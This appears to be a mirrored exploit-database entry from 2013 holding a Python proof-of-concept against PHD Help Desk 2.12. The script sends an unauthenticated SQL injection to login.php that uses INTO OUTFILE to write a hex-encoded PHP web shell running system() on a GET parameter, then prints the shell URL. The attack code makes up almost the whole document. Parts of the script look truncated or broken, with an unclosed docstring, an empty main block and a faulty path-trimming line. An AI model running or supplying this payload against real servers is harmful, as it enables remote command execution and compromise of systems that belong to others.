PHD Help Desk 2.12 – SQL Injection

  • 作者: drone
    日期: 2013-06-03
  • 类别:
  • 来源:
  • # Exploit Title: PHD Help Desk 2.12 SQLi
    # Date: 05/24/2013
    # Exploit Author: drone (@dronesec)
    # More information:
    # Vendor Homepage:
    # Software Link:
    # Version: 2.12
    # Tested on: Ubuntu 12.04 (apparmor disabled)
    """ This app is so full of SQLi & XSS; if you're looking for
    practice with real web apps, this is a good place to go.
    You don't need auth for this.
    from argparse import ArgumentParser
    import string
    import random
    import urllib, urllib2
    import sys
    def run(options):
    print '[!] Dropping web shell on %s...'%(options.ip)
    shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5))
    # <? php system($_GET["rr"]); ?>
    data = urllib.urlencode({'operador':('\' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e'
    ',null,null,null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE'
    ' \'{0}/{1}.php'.format(options.path,shell)),
    urllib2.urlopen('http://{0}{1}/login.php'.format(options.ip, options.rootp), data)
    print '[!] Shell dropped.http://%s%s/%s.php?rr=ls'%(options.ip,options.rootp,shell)
    def parse():
    parser = ArgumentParser()
    parser.add_argument('-i',help='server address',action='store',dest='ip')
    parser.add_argument('-p',help='path to login.php (/phd_2_12)',action='store',
    default='/phd_2_12', dest='rootp')
    parser.add_argument('-w',help='writable web path (/var/www/phd_2_12) for shell',
    default='/var/www/phd_2_12/', action='store', dest='path')
    options = parser.parse_args()
    if not options.ip:
    options.path = options.path if options.path[-1] != '/' else options.path[:-1]
    options.rootp = options.rootp if options.path[-1] != '/' else options.path[:-1]
    return options
    if __name__=="__main__":